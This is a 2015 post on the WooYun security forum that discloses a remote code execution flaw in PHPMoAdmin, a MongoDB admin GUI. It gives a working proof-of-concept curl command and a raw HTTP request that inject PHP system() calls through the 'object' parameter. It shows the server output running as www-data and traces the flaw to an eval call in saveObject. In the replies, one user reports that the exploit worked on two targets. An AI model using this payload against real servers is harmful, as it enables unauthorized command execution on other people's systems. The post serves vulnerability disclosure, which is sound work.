当前位置:WooYun(白帽子技术社区) >> php >> PHPMoAdmin Remote Code Execution(附POC)

PHPMoAdmin Remote Code Execution(附POC)

五道口杀气 | 2015-03-04 12:40

from:http://packetstormsecurity.com/files/130638/phpmoadmin-exec.txt

mongodb Gui存在命令执行

POC:

curl "http://path.to/moadmin.php" -d "object=1;system('id');exit"

POST /moadmin/moadmin.php HTTP/1.1
Host: 192.168.33.10
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:36.0)
Gecko/20100101 Firefox/36.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 34

object=1;system('id;ls -lha');exit


HTTP/1.1 200 OK
Date: Tue, 03 Mar 2015 16:57:40 GMT
Server: Apache/2.4.7 (Ubuntu)
Set-Cookie: PHPSESSID=m0ap55aonsj5ueph7hgku0elb1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0,
pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 223
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html

uid=33(www-data) gid=33(www-data) groups=33(www-data)
total 116K
drwxr-xr-x 1 longcat longcat  102 Mar  3 16:55 .
drwxr-xr-x 6 root    root    4.0K Mar  3 16:17 ..
-rw-rw-r-- 1 longcat longcat 112K Mar  3 16:55 moadmin.php


漏洞分析:

1. create new moadminComponent object
1977: $mo = new moadminComponent;

2. if the http-post parameter 'object' is set
738: class moadminComponent {
...
762: public function __construct() {
...
786: if (isset($_POST['object'])) {
787:    if (self::$model->saveObject($_GET['collection'],
$_POST['object'])) {
...

3. evaluate the value of 'object' as PHP code
692: public function saveObject($collection, $obj) {
693:    eval('$obj=' . $obj . ';'); //cast from string to array

分享到:
  1. 1#
    回复此人 感谢
    MeirLin (我需要AV(安慰)) | 2015-03-04 12:55

    前排。

  2. 2#
    回复此人 感谢
    剑芯 | 2015-03-04 12:57

    瓜子

  3. 3#
    回复此人 感谢
    MeirLin (我需要AV(安慰)) | 2015-03-04 13:11

    试了两个全中。。

  4. 4#
    回复此人 感谢
    My5t3ry | 2015-03-04 13:18

  5. 5#
    回复此人 感谢
    360网站卫士 (专业爆腾讯漏洞30年) | 2015-03-04 13:18

    PHPMoAdmin /moadmin.php 远程命令执行漏洞 (0-Day) POC: http://www.beebeeto.com/pdb/poc-2015-0044/

  6. 6#
    回复此人 感谢
    ヤ深蓝T透 | 2015-03-04 13:30

      赞

  7. 7# 感谢(1)
    回复此人 感谢
    白开水 | 2015-03-04 13:59

  8. 8#
    回复此人 感谢
    luwikes (土豆你个西红柿,番茄你个马铃薯~~~) | 2015-03-04 14:39

  9. 9#
    回复此人 感谢
    胡小树 | 2015-03-04 15:44

    好屌

  10. 10#
    回复此人 感谢
    疯狂 (One day is a day) | 2015-03-04 15:56

    这个可以有

  11. 11#
    回复此人 感谢
    M4ster (Black || White) | 2015-03-04 17:45

    shenmegui,这个程序根本没有人用。

  12. 12#
    回复此人 感谢
    存在敏感词 (昵称存在敏感词) | 2015-03-04 19:08

    这没人维护没人用的系统都给了CVE你敢信
    http://seclists.org/oss-sec/2015/q1/744

  13. 13#
    回复此人 感谢
    我了个去 | 2015-03-10 20:56

    我看成phpmyadmin了。。。

  14. 14#
    回复此人 感谢
    llongwei (帅得惊动党中央) | 2015-03-16 15:28

    我看成phpmyadmin了。。。

  15. 15#
    回复此人 感谢
    小峰子0204 | 2015-03-31 21:20

    我看成phpmyadmin了。。。

  16. 16#
    回复此人 感谢
    浩森 | 2015-03-31 21:29

    @ヤ深蓝T透 又来探测了???

  17. 17#
    回复此人 感谢
    黑名单 (我就喜欢你们讨厌我,又干不过我的样子!) | 2015-04-03 14:25

    我看成phpmyadmin了。。。

添加新回复

登录 后才能参与评论.

WooYun(白帽子技术社区)

网络安全资讯、讨论,跨站师,渗透师,结界师聚集之地

登录